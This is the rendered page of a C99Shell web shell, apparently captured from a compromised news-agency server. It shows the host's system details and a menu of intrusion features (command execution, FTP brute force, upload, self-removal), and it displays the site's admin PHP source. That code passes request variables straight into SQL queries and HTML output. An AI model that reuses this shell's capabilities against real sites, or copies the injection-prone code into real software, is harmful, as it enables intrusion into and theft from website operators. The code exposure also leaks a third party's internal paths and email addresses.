!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t 

Safe-mode: OFF (not secure)

/home/mnnews/public_html/mina/minabusiness/admin/   drwxr-xr-x
Free 3.9 GB of 27.03 GB (14.42%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addingNews.inc.php3 (5.36 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
   
  if(checkSuperSession($superSession, $REMOTE_ADDR))
    {
      include("include/rootGui.inc.php3");
   
      require("$mysqlCall");
   
      $userId = getUserSUId($superSession);
      $userInfo = getUserInfo($userId);
      
      if(($userInfo[SuperUser] == 1) && ($userInfo[addNews]==1) && ($userInfo[active]==1))
    {
      
      if(strlen($title)==0)
        {
      print("ERROR <br>Nijeste unijeli naslov.<br><br>");
        }
      
      else if(strlen($details)==0)
        {
          print("ERROR <br>Nijeste unijeli tekst<br><br>");
        }
      
      
      else if($function=="preview")
        {
          
          require("$mysqlCall");
          
          if($itemID != 0)
        {
          require("$mysqlCall");
          
          $query = "SELECT * FROM $topics  where Id=\"$itemID\"";
          
          $mysql_result2 = mysql_query($query, $mysql_link);
          
          if($row = mysql_fetch_row($mysql_result2))
            {
              $imageId =  $row[3];
              
              $getImage=1;
            }
          else
            {
              print("Something wrong: get image data<br>");
            }
        }


          print("Pregled");
          print("<table width=70% border=0 cellpadding=3 cellspacing=0 >");
          print("<tr><td bgcolor=$border_colour align=center>");
          
          print("<table width=100% border=0 cellpadding=5 cellspacing=0 >");
          
          printf("<tr>\n");

          $prazno=nl2br($details);
       
          print("<td bgcolor=$bgcolour>\n");
          print("<h1><u>$title</u></h1>\n");
            print("<div align=\"justify\"><p>$slag\n</p></div>");
          print("<div align=\"justify\"><p>$prazno\n</p></div>");
          print("</td>\n");
    
          print("<td bgcolor=$bgcolour>\n");
          
        /*    print("item = $itemID"); */
          
          
          if($getImage==1)
        {      
          print("<img src=\"imageShow.php3?id=$imageId\">");
        }

          else
        {
          print("Nema rubrike");
      
        }


          print("</td>\n");



      
          print("</tr>\n");
          print("</table>");
          print("<tr><td>");
          print("</table><br><br>");


          include("addNewsTemp.inc.php3");
                    
        }
      
      else
        {
          printf("unosim vijest....");
$details = eregi_replace("'","#",$details);

          
          
          $insert = "insert into $news values('', '$title', '$details', '$date', '$itemID', '$userId', '$slag')";
          print "<br>";
          $result = MYSQL_QUERY($insert);        
          
          if($result)
        {

$extra_headers1 = "From: MINA <mnnews@mnnews.net> \n";
$extra_headers1 .= "MIME-Version: 1.0\n";
$extra_headers1 .= "Content-Type: text/plain; \n";
$extra_headers1 .= " charset=windows-1250";
$body = "<START>\n\n";
$body .= "$date\n\n";
$body .= "*";
$body .= "EKO - $slag\n";
$body .= "$title * \n\n";
$body .= "$details (kraj) \n\n";
$body .= "<END>";
$message = "$body";
include("/home/mnnews/public_html/login/adresebiz.inc");
$adresa1 ="$adresa";
$extra_headers = "$extra_headers1";
         
mail("$adresa1", "$date - $slag - $title", "$message", "$extra_headers" );


    
        $extra_headers2 = "From: MINA <mnnews@mnnews.net> \n";
        $extra_headers2 .= "MIME-Version: 1.0\n";
        $extra_headers2 .= "Content-Type: text/plain; \n";
        
        $slag1 = $slag;
        $slag1 = str_replace("æ","ch",$slag1);
        $slag1 = str_replace("è","cc",$slag1);
        $slag1 = str_replace("š","ss",$slag1);
        $slag1 = str_replace("ž","zz",$slag1);
        $slag1 = str_replace("ð","dj",$slag1);
        $slag1 = str_replace("Š","SS",$slag1);
        $slag1 = str_replace("Ð","Dj",$slag1);
        $slag1 = str_replace("È","CC",$slag1);
        $slag1 = str_replace("Æ","CH",$slag1);
        $slag1 = str_replace("Ž","ZZ",$slag1);

        
        $body2 .= "EKO - $slag1\n";
        $title1 = $title;
        $title1 = str_replace("æ","ch",$title1);
        $title1 = str_replace("è","cc",$title1);
        $title1 = str_replace("š","ss",$title1);
        $title1 = str_replace("ž","zz",$title1);
        $title1 = str_replace("ð","dj",$title1);
        $title1 = str_replace("Š","SS",$title1);
        $title1 = str_replace("Ð","Dj",$title1);
        $title1 = str_replace("È","CC",$title1);
        $title1 = str_replace("Æ","CH",$title1);
        $title1 = str_replace("Ž","ZZ",$title1);

        
        $body2 .= "$title1  \n\n";
        $details1 = $details;
        $details1 = str_replace("æ","ch",$details1);
        $details1 = str_replace("è","cc",$details1);
        $details1 = str_replace("š","ss",$details1);
        $details1 = str_replace("ž","zz",$details1);
        $details1 = str_replace("ð","dj",$details1);
        $details1 = str_replace("Š","SS",$details1);
        $details1 = str_replace("Ð","Dj",$details1);
        $details1 = str_replace("È","CC",$details1);
        $details1 = str_replace("Æ","CH",$details1);
        $details1 = str_replace("Ž","ZZ",$details1);
        $body2 .= "$details1 \n\n";
        $message1 = "$body2";
        $adresa2 .= "infoklip@mn.yu" ;
        $adresa3 ="$adresa2";
        $extra_headers1 .= "Cc: $adresa3 \n";

        $extra_headers = "$extra_headers2";
         
        mail("$adresa3", "MINA $date", "$message1", "$extra_headers2" );


          print("Unijeto");
          print("<META HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=index.php3?mode=listNews&superSession=$superSession\">");
        }

          else
        {
          print("Nesto nije u redu");
        }
        }
    }
      else
    {
      print("You do not have access to this function<br><br>");

    }
      include("include/guiBase.inc.php3");
      
    }
  else
    {
      //session is bad
      print("Bad Session ID ($superSession)!<BR>\n");
      $superSession = "";
    }

?>











:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0037 ]--